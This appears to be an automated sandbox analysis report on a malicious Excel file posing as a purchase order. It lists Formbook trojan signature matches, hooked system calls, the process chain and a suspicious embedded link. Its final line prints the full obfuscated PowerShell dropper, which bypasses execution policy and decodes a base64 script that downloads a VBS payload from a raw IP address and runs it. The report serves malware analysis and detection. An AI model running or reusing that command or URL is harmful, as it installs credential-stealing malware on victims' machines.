Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FC48 NtSetInformationFile,	27_2_00A6FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A71D80 NtSuspendThread,	27_2_00A71D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FD8C NtDelayExecution,	27_2_00A6FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FD5C NtEnumerateKey,	27_2_00A6FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FEA0 NtReadVirtualMemory,	27_2_00A6FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FED0 NtAdjustPrivilegesToken,	27_2_00A6FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FE24 NtWriteVirtualMemory,	27_2_00A6FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FFB4 NtCreateSection,	27_2_00A6FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FFFC NtCreateProcessEx,	27_2_00A6FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FF34 NtQueueApcThread,	27_2_00A6FF34

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE89AA34CE	8_2_000007FE89AA34CE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE89AA6FBE	8_2_000007FE89AA6FBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00401978	27_2_00401978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00403060	27_2_00403060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004011F0	27_2_004011F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0042EAF3	27_2_0042EAF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040239E	27_2_0040239E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004023A0	27_2_004023A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040FC6A	27_2_0040FC6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040FC73	27_2_0040FC73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00402C11	27_2_00402C11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416623	27_2_00416623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416622	27_2_00416622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040FE93	27_2_0040FE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040DF13	27_2_0040DF13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004027C0	27_2_004027C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004027BC	27_2_004027BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7E0C6	27_2_00A7E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7E2E9	27_2_00A7E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B263BF	27_2_00B263BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AA63DB	27_2_00AA63DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A82305	27_2_00A82305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00ACA37B	27_2_00ACA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0443E	27_2_00B0443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B005E3	27_2_00B005E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A9C5F0	27_2_00A9C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AC6540	27_2_00AC6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A84680	27_2_00A84680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8E6C1	27_2_00A8E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B22622	27_2_00B22622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00ACA634	27_2_00ACA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8C7BC	27_2_00A8C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AA286D	27_2_00AA286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8C85C	27_2_00A8C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A829B2	27_2_00A829B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B2098E	27_2_00B2098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B149F5	27_2_00B149F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A969FE	27_2_00A969FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00ACC920	27_2_00ACC920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B2CBA4	27_2_00B2CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B06BCB	27_2_00B06BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B22C9C	27_2_00B22C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0AC5E	27_2_00B0AC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AB0D3B	27_2_00AB0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8CD5B	27_2_00A8CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AB2E2F	27_2_00AB2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A9EE4C	27_2_00A9EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B1CFB1	27_2_00B1CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AF2FDC	27_2_00AF2FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A90F3F	27_2_00A90F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AAD005	27_2_00AAD005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AFD06D	27_2_00AFD06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A83040	27_2_00A83040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A9905A	27_2_00A9905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0D13F	27_2_00B0D13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B21238	27_2_00B21238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7F3CF	27_2_00A7F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A87353	27_2_00A87353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A91489	27_2_00A91489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AB5485	27_2_00AB5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00ABD47D	27_2_00ABD47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B235DA	27_2_00B235DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A8351F	27_2_00A8351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0579A	27_2_00B0579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AB57C3	27_2_00AB57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B1771D	27_2_00B1771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B1F8EE	27_2_00B1F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AFF8C4	27_2_00AFF8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B05955	27_2_00B05955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0394B	27_2_00B0394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B33A83	27_2_00B33A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0DBDA	27_2_00B0DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7FBD7	27_2_00A7FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AA7B00	27_2_00AA7B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B1FDDD	27_2_00B1FDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00B0BF14	27_2_00B0BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00AADF7C	27_2_00AADF7C

Document contains embedded VBA macros

Source: PO#BBGR2411PO69.xls	OLE indicator, VBA macros: true
Source: 09230000.0.dr	OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: PO#BBGR2411PO69.xls	Stream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25
Source: 09230000.0.dr	Stream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00A7E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00A7DF5C appears 137 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AEF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AC373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AC3F92 appears 132 times

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior

Yara signature match

Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winXLS@31/36@11/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\09230000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8796.tmp

Source: PO#BBGR2411PO69.xls	OLE indicator, Workbook stream: true
Source: 09230000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3...................... .y.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................^k....}..w.... .y.....\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................^k....}..w.... .y.....\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....x.......N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..?T.....&.^k......S.....(.P.....................x....... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....................x.......8.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........x.......F.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.............................l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .y.....}..w.............?T.....&.^k......S.....(.P.....................x...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................ .y.............0........Wl.....}..w............@E......^...............(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................ .y......................Wl.....}..w............@E......^...............(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m.....p.......................p.......x........................3......................p...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P..... .......X.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................<..............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................-).l....}..w.....<......\.......................(.P.....................8...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................-).l....}..w.....<......\.......................(.P.....................8...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.(.^......(.l.....s......(.P............................. .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.............................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................<..............0. ......Wl.....}..w....8.......@E......^...............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................<.......................Wl.....}..w....8.......@E......^...............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m..............................................................3......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P............. .......................................

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: PO#BBGR2411PO69.xls

Virustotal: Detection: 7%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
